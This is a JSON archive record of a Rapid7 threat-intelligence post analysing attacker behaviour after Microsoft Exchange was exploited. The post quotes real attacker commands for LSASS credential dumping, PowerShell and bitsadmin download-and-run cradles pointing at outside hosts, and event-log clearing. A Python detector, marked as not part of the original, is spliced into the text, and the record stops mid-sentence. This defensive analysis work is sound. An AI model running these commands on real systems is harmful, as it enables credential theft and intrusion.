{
	"id": "ee0698b8-0042-44e4-a6dd-08e566026038",
	"created_at": "2026-04-06T01:30:58.196751Z",
	"updated_at": "2026-04-10T13:11:35.626366Z",
	"deleted_at": null,
	"sha1_hash": "4dac904aa52be16139e9c7ef8337ecf9c4658b25",
	"title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 155222,
	"plain_text": "Defending Against the Zero Day: Analyzing Attacker Behavior\r\nPost-Exploitation of Microsoft Exchange\r\nBy Eoin Miller\r\nPublished: 2021-03-23 · Archived: 2026-04-06 01:13:28 UTC\r\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in\r\nMicrosoft’s Exchange Server by an attacker referred to as HAFNIUM. One of the major reasons these latest\r\nvulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public\r\ninternet to executing processes as SYSTEM, the most privileged user, on the victim's system.\r\n“Running as a low-privileged account is a good security practice because then a software bug can't be used by a\r\nmalicious user to take over the whole system.”\r\nSource: Application Pool Identities\r\nBecause this service runs with the highest level of permission by default, it should be hardened and receive\r\nadditional levels of monitoring. This default configuration does not employ the principle of least privilege and is\r\nmade even more dangerous as these web applications are created with the intent to be exposed to the public\r\ninternet and not protected by other basic means like network access control lists. In addition to that, these\r\nvulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of\r\nthe entire organization. This is one of the most direct routes to what certain attackers are commonly after in a\r\nvictim’s environment.\r\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been\r\nobserved by many in the information security industry for many years. Attackers of many types are more\r\nfrequently looking to exploit the network services provided by victims to the public internet. 
Often, these services are on edge devices designed specifically to be exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security software, such as endpoint detection and response, and they also commonly fall outside of standard patch management systems. Rapid7 has observed a shrinking window between the disclosure of a vulnerability and the creation and mass adoption of a working exploit, which gives victims little time to test and deploy fixes while adhering to the change control process for systems providing mission-critical services.\r\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. These attackers typically target the mailboxes of specific high-ranking members of organizations or of employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold is password spraying against systems providing remote access to the public internet via Remote Desktop Protocol. 
More advanced attackers have taken advantage of recent vulnerabilities in Citrix Netscaler, Progress’ Telerik, and Pulse Secure’s Pulse Connect Secure, to name a few.\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 1 of 15\n\nWhile the method of gaining a foothold in a victim’s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts once inside can remain unchanged for many years. The reason is that the methods used once inside a victim’s systems rarely need to change, as they continue to be very effective for the attacker. The continued adoption of “living off the land” techniques, which use utilities that ship with the operating system, makes antivirus or application control less likely to catch and thwart an attacker. It also frees up or reduces the attacker’s need for technical resources to develop exploits and tool sets.\r\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our Managed Detection and Response Security Operations Center and Incident Response teams to develop and update the detections in InsightIDR’s Attacker Behavior Analytics, so that all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerts on attacker behavior even when the initial access came through exploitation of an unknown vulnerability.\r\nLast, it is extremely important not to immediately assume that only a single actor is exploiting these new vulnerabilities. 
Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or a single group may do so and carry out several different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\r\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a China Chopper web shell against nine distinct victims across industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7’s Insight Agent from Feb. 27 through March 7, 2021. It should be noted that the command line the China Chopper client produces when it spawns processes through the webshell (cmd /c cd /d \u003cdirectory\u003e\u0026\u003ccommand\u003e\u0026echo [S]\u0026cd\u0026echo [E]) has remained virtually unchanged since at least 2013. These command line arguments are quite distinct and easy to find in any log source that records command line arguments, which means detections developed against this pattern have the potential for an effective lifespan of the better part of a decade.\r\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that, by default, the IIS worker process that serves Microsoft Exchange’s Outlook Web Access has the following environment variable and value set:\r\nAPP_POOL_ID=MSExchangeOWAAppPool\r\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with InsightIDR’s Attacker Behavior Analytics, the TIDE team was able to write a detection that matches any time a process is executed where either the child’s or the parent’s environment contains this variable and value. 
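The detection described above, as an added example that is not part of the original post or of InsightIDR: a small Python detector run over constructed process-creation events. The field names (parent_image, cmdline, env), the pids and the dump path are assumptions made for the example; the two base64 blobs are the ones quoted later in this post. It flags any process whose own or parent environment carries APP_POOL_ID=MSExchangeOWAAppPool, matches the China Chopper cmd /c cd /d ...\u0026echo [S] command-line trailer, the ProcDump and comsvcs.dll MiniDump dumps of lsass.exe, wevtutil log clearing and download cradles, and it decodes -EncodedCommand arguments (UTF-16LE base64, including ones cut short by log truncation) before matching.

```python
"""Behaviour-based detector for processes spawned from Exchange OWA.

Added example, not code from the Rapid7 post or InsightIDR. Event field
names and the sample events are assumptions made for the example.
"""
import base64
import binascii
import re

OWA_APP_POOL = ("APP_POOL_ID", "MSExchangeOWAAppPool")

# Command-line signatures; names echo the detection titles in the post.
CHINA_CHOPPER = re.compile(r"^cmd(?:\.exe)?\s+/c\s+cd\s+/d\s+.+&echo \[S\]", re.I)
LSASS_DUMP = re.compile(
    r"procdump(?:64)?(?:\.exe)?\s.*-ma\s+lsass|comsvcs\.dll[ ,]+MiniDump", re.I)
EVTLOG_CLEAR = re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)
TOOL_TRANSFER = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient|download(?:string|file)|\biex\b|"
    r"invoke-(?:expression|webrequest)|bitsadmin.*/transfer|msiexec.*\s/i\s+https?://",
    re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE plaintext behind -enc/-e/-EncodedCommand, or None.

    Blobs cut short by log truncation (as in the redacted command lines in
    the post) are decoded as far as the data allows rather than rejected.
    """
    for flag, blob in ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue  # e.g. -ep (ExecutionPolicy) is not an encoded command
        core = blob.rstrip("=")
        try:
            raw = base64.b64decode(core + "=" * (-len(core) % 4))
        except binascii.Error:
            raw = base64.b64decode(core[: len(core) // 4 * 4])
        return raw.decode("utf-16-le", errors="ignore")
    return None


def spawned_from_owa(event):
    """True when the child or its parent carries the OWA app-pool marker."""
    key, value = OWA_APP_POOL
    return any(env.get(key) == value
               for env in (event.get("env", {}), event.get("parent_env", {})))


def classify(event):
    """Return the detection names that fire for one process-creation event."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_powershell(cmdline)
    hits = []
    if spawned_from_owa(event):
        hits.append("Process Spawned By Outlook Web Access")
    if CHINA_CHOPPER.search(cmdline):
        hits.append("China Chopper Webshell Executing Commands")
    if LSASS_DUMP.search(cmdline):
        hits.append("Credential Dump Of LSASS Memory")
    if EVTLOG_CLEAR.search(cmdline):
        hits.append("Clearing Event Logs With WEvtUtil")
    if TOOL_TRANSFER.search(cmdline) or (decoded and TOOL_TRANSFER.search(decoded)):
        hits.append("Download Cradle Or Ingress Tool Transfer")
    return hits


def run(events):
    """Map pid -> detections for every event that produced at least one hit."""
    return {e["pid"]: hits for e in events if (hits := classify(e))}


# Constructed sample telemetry modelled on the command lines quoted in the
# post; pids and the dump path are made up, the base64 blobs are the post's.
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
OWA_ENV = {"APP_POOL_ID": "MSExchangeOWAAppPool"}
SAMPLE_EVENTS = [
    {"pid": 4412, "parent_image": W3WP, "env": OWA_ENV,
     "cmdline": r"cmd /c cd /d C:\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]"},
    {"pid": 4420, "parent_image": W3WP, "env": OWA_ENV,
     "cmdline": "powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A"},
    {"pid": 4431, "parent_image": W3WP, "env": OWA_ENV,
     "cmdline": r"powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\x.tmp.dmp full"},
    {"pid": 4437, "parent_image": W3WP, "env": OWA_ENV,
     "cmdline": "cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB"},
    {"pid": 4450, "parent_image": W3WP, "env": OWA_ENV,
     "cmdline": "CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x"},
    # Benign: an administrator's shell with no OWA marker and no signature.
    {"pid": 5102, "parent_image": r"C:\Windows\explorer.exe", "env": {},
     "cmdline": r"cmd.exe /c dir C:\inetpub\wwwroot\aspnet_client"},
]

if __name__ == "__main__":
    for pid, hits in run(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

The environment-variable check is the broad net: it fires on every child of the OWA worker process regardless of tooling, which is what caught the attackers using techniques other than China Chopper. The command-line signatures are narrower but, as the post notes for the China Chopper trailer, they have stayed stable for years. Decoding before matching matters because the download cradles in this post are only visible in the UTF-16LE plaintext, not in the base64 on the command line.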
This allowed us not only to find the already known use of China Chopper, but also several other attackers exploiting this vulnerability with different techniques.\r\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility procdump64.exe against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve the dump and analyze it later with utilities such as mimikatz to extract the credentials cached in that process. This enables the attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a user’s password is “ThisIsMyPassword1!”, when forced to change it they will likely just increment the digit at the end to “ThisIsMyPassword2!”. 
This makes it easy for attackers to guess future passwords based on the predictability of human behavior.\r\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\r\nProcDump (procdump64.exe) commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\r\ncmd /c cd /d C:\\\\root\u0026procdump64.exe -accepteula -ma lsass.exe lsass.dmp\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d E:\\\\logs\u0026procdump64.exe -accepteula -ma lsass.exe lsass.dmp\u0026echo [S]\u0026cd\u0026echo [E]\r\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026HOSTNAME\" \u0026 nl\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026nltest\" /dclist\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026HOSTNAME\" \u0026 who\r\ncmd /c cd /d c:\\\\temp\u0026tasklist\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d E:\\\\logs\u0026tasklist \u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026net group \"Domain computers\" /do\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026tasklist /v\u0026echo [S]\u0026cd\u0026echo [E]\r\nEnumeration of further information about specific processes on the victim system. 
The process smex_master.exe\r\nis from Trend Micro’s ScanMail and unsecapp.exe is from Microsoft Windows.\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=smex_master.exe get Executable\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=unsecapp.exe get ExecutablePath\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=unsecapp.exe get processid\u0026echo\r\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\r\ncmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web\u0026net group \"Exchange Organization administrators\" a\r\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper\r\nwebshell:\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026ping\" -n 1 \u003cRE\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026ping\" -n 1 \u003cRED\r\ncmd /c cd /d C:\\inetpub\\wwwroot\u0026ping -n 1 8.8.8.8\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026c:\\windows\\temp\\curl.exe -m 10 ipinfo.io\u0026echo [S]\u0026cd\u0026ec\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.googl\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026ping -n 1 ipinfo.io\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026ping -n 1 www.google.com\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d c:\\\\temp\u0026ping www.google.com\u0026echo [S]\u0026cd\u0026echo 
[E]\r\nSecond-stage payload retrieval commands executed via China Chopper webshell:\r\ncmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\u0026msiexec /q /i http://103.212.223.210:9900/nvidia.msi\u0026echo [S]\u0026\r\nFilesystem interaction commands executed via China Chopper webshell to search file contents and to hide and delete files:\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026findstr Request \"\\\\\u003cREDACTED_HOSTNAME\u003e\\C$\\Program Fil\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026attrib +h +s +r OutlookEN.aspx\u0026echo [S]\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026attrib +h +s +r TimeoutLogout.aspx\u0026echo [S]\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpP\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpP\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Net Command Deleting Exchange Admin Group\r\nAttacker Tool - China Chopper Webshell Executing Commands\r\nAttacker Technique - ProcDump Used Against LSASS\r\nT1003 - OS Credential Dumping\r\nT1003.001 - OS Credential Dumping: LSASS Memory\r\nT1005 - Data from Local System\r\nT1007 - System Service Discovery\r\nT1033 - System Owner/User Discovery\r\nT1041 - Exfiltration Over C2 Channel\r\nT1047 - Windows Management Instrumentation\r\nT1057 - Process Discovery\r\nT1059 - Command and Scripting Interpreter\r\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\r\nT1071 - Application Layer Protocol\r\nT1071.001 - Application Layer Protocol: Web Protocols\r\nT1074 - Data Staged\r\nT1074.001 - Data Staged: Local Data 
Staging\r\nT1083 - File and Directory Discovery\r\nT1087 - Account Discovery\r\nT1087.001 - Account Discovery: Local Account\r\nT1087.002 - Account Discovery: Domain Account\r\nT1098 - Account Manipulation\r\nT1105 - Ingress Tool Transfer\r\nT1190 - Exploit Public-Facing Application\r\nT1203 - Exploitation For Client Execution\r\nT1218 - Signed Binary Proxy Execution\r\nT1218.007 - Signed Binary Proxy Execution: Msiexec\r\nT1505 - Server Software Component\r\nT1505.003 - Server Software Component: Web Shell\r\nT1518 - Software Discovery\r\nT1518.001 - Software Discovery: Security Software Discovery\r\nT1531 - Account Access Removal\r\nT1583 - Acquire Infrastructure\r\nT1583.003 - Acquire Infrastructure: Virtual Private Server\r\nT1587 - Develop Capabilities\r\nT1587.001 - Develop Capabilities: Malware\r\nT1587.004 - Develop Capabilities: Exploits\r\nT1588 - Obtain Capabilities\r\nT1588.001 - Obtain Capabilities: Malware\r\nT1588.002 - Obtain Capabilities: Tool\r\nT1588.005 - Obtain Capabilities: Exploits\r\nT1588.006 - Obtain Capabilities: Vulnerabilities\r\nT1595 - Active Scanning\r\nT1595.001 - Active Scanning: Scanning IP Blocks\r\nT1595.002 - Active Scanning: Vulnerability Scanning\r\nRapid7 has also observed several additional distinct types of post-exploitation activity following exploitation of these Exchange vulnerabilities in recent weeks, by attackers other than HAFNIUM. We have grouped these and distilled the unique types of commands being executed into the individual sections shown below.\r\nMinidump and Makecab attacker\r\nThis attacker was seen uploading batch scripts to execute the Microsoft utility dsquery.exe to enumerate all users from the Active Directory domain. 
The attacker would also use the MiniDump function in comsvcs.dll with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then used the built-in Microsoft utility makecab.exe to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in other reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\r\nC:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\r\nC:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\r\ndsquery * -limit 0 -filter objectCategory=person -attr * -uco\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_33_CHARACTER_STRING\u003e.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_33_CHARACTER_STRING\u003e.tmp c:\\inetpub\\wwwroot\\aspnet_client\\\u003cRE\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Minidump via COM Services DLL\r\nMalicious DLL attacker\r\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have functionality similar to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with klist to display cached Kerberos tickets. 
This again has some overlap with the types of data being collected by HAFNIUM, but\r\nthe methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\r\nc:\\windows\\system32\\cmd.exe /c tasklist\r\ntasklist\r\nc:\\windows\\system32\\cmd.exe /c net time /do\r\nnet time /do\r\nc:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm \u003e c:\\programdata\\1.txt\r\nrundll32 c:\\programdata\\demo.dll,run -lm \u003e c:\\programdata\\1.txt\r\nc:\\windows\\system32\\cmd.exe /c klist\r\nc:\\windows\\system32\\cmd.exe /c tasklist\r\ntasklist\r\nc:\\windows\\system32\\cmd.exe /c netstat -ano\r\nnetstat -ano\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nOpera Browser and Cobalt Strike attacker\r\nThis attacker was seen using common techniques to download scripts with Microsoft’s BITSAdmin. These scripts\r\nwould then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser\r\nthat has a known DLL search order vulnerability (CVE-2018-18913). The attacker would also retrieve malicious\r\nDLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This\r\nwould then load the malicious code in the DLL located in the same directory as the browser. 
The eventual end of this chain would be the execution of Cobalt Strike, a favorite tool of attackers who distribute ransomware:\r\nC:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\r\nC:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\nmsiexec.exe -k\r\npowershell Start-Sleep -Seconds 10\r\ncmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\r\nC:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\nBase64 decoded strings passed to PowerShell:\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\op\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\op\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\op\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Download And Execute With Background Intelligent Transfer Service\r\nAttacker Technique - URL Passed To BitsAdmin\r\nSix-character webshell attacker\r\nThis attacker was seen 
uploading webshells and copying them to other locations within the webroot.\r\ncmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Fron\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nEncoded PowerShell download cradle attacker\r\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. They would also execute the getmac.exe utility to enumerate information about the network adapters.\r\ncmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB\r\nC:\\Windows\\system32\\getmac.exe /FO CSV\r\nBase64 decoded strings passed to PowerShell:\r\nIEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - PowerShell Download Cradles\r\nTen-character webshell attacker\r\nThis attacker was seen uploading webshells and using icacls to recursively set the directory permissions of the webroot to read-only. 
Additionally, the attacker would use the attrib.exe utility to mark the file containing the webshell as hidden and system, making it harder to find.\r\nC:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\r\nC:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\aut\r\nC:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\au\r\nattrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\u003cREDACTED_10_CHARACTER_STRING\r\nC:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\aut\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Modification Of Files In Exchange Webroot\r\n7zip and NetSupport Manager attacker\r\nThis attacker used the 7zip compression utility (renamed to MonitoringLog.exe) and the NetSupport Manager remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and extracted from a password-protected archive named Service.Information.rtf. 
Once extracted, these utilities were executed:\r\nc:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\r\nc:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\r\npowershell C:\\Programdata\\script1.ps1\r\nC:\\ProgramData\\MonitoringLog.exe x -p\u003cREDACTED_STRING\u003e -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramDat\r\nping -n 10 127.0.0.1\r\nc:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\r\ntaskkill /Im rundll32.exe /F\r\nC:\\ProgramData\\NetConnections\\client32.exe\r\nping -n 10 127.0.0.1\r\ntaskkill /Im rundll32.exe /F\r\nc:\\windows\\system32\\cmd.exe /c tasklist /v\r\ntasklist /v\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nEvent log deletion and virtual directory creation attacker\r\nThis attacker created virtual directories within the existing webroot using the Microsoft utility appcmd.exe, and then cleared all event logs on the system using wevtutil.exe:\r\nCMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /ph\r\nCMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\r\nwevtutil el\r\nwevtutil cl \u003cREDACTED_ALL_DIFFERENT_EVENT_LOGS\u003e\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Clearing Event Logs With WEvtUtil\r\nWebshell enumeration attacker\r\nThis attacker was seen executing encoded PowerShell commands that use the type command to view the contents of possible webshell files named outlooken.aspx, seen used by HAFNIUM and other attackers. 
This could be someone looking to use the footholds placed by other attackers, or even researchers using the same exploit to identify systems that have been successfully compromised, based on the reported activity associated with HAFNIUM:\r\ncmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwA\r\ncmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAR\r\nBase64 decoded strings:\r\ntype \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nCoinminer dropper attacker\r\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\r\ncmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\win\r\npowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\ds\r\nC:\\windows\\temp\\dsf.exe RS9+cn_0\r\nAnd again with a slightly different filename retrieved from the same host:\r\ncmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\\r\npowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\r\nC:\\windows\\temp\\dsf.exe RS9+cn_0\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nSimple reconnaissance attacker(s)\r\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\r\nnet group 
/domain\r\nnet group \"Domain Computers\" /do\r\nnet group \"Domain Users\" /do\r\nnet group IntranetAdmins /do\r\nnet user /domain\r\nsysteminfo\r\ntasklist\r\nAnother example where only simple recon type commands were executed:\r\nwhoami\r\nsysteminfo\r\nsysteminfo\r\nwmic product get name\r\nWmic product get name\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nConclusions\r\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 even observed exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used these vulnerabilities to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access to various Active Directory services for as long 